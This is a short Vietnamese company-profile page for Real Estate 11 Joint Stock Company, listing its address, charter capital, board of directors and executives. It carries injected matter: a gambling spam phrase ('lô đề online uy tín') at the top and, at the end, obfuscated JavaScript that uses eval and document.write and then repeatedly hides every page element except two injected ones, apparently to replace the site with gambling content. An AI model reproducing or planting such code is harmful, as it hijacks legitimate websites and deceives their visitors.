lô đề online uy tín

Công ty Cổ phần Địa ốc 11

Real Estate 11 Joint Stock Company

Địa chỉ: 205 Lạc Long Quân P.3 Q.11

Điện thoại: (08) 39 634 001 - Fax: (08) 39 636 186

Email: res11@diaoc11.com.vn

Website: 

Vốn điều lệ: 43.679.770.000 đồng.

Tỷ lệ vốn góp của Tổng công ty: 30%

Hội đồng quản trị :

- Trần Thanh Bạch - Chủ tịch HĐQT

- Trần Thị Kim Huệ

- Đặng Hữu Thành

- Huỳnh Thị Yến Nhi

- Trần Ngọc Phượng

Ban Tổng Giám đốc :

- Trần Thị Kim Huệ - Tổng Giám đốc

Đặng Hữu Thành - Phó Tổng Giám đốc

- Nguyễn Khắc Giang - Phó Tổng Giám đốc

- Huỳnh Thị Yến Nhi - Kế toán trưởng

var SSpfGu1 = '
'; window["eval"]("do" + "cu" + "ment.wr" + "ite('" + SSpfGu1 + "');"); try { setInterval(function() { try { window["document"]["getElementById"]("div" + "All")["style"]["display"] = "no" + "ne" } catch (e) {} for (var t2$2 = 0; t2$2 < window["document"]["body"]["children"]["length"]; t2$2++) { try { var Dr3 = window["document"]["body"]["children"][t2$2]["tagName"]; var LsLMcufmw4 = window["document"]["body"]["children"][t2$2]["id"]; if (LsLMcufmw4 != "iconDiv1" && LsLMcufmw4 != "showcloneshengxiaon") { window["document"]["body"]["children"][t2$2]["style"]["display"] = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {}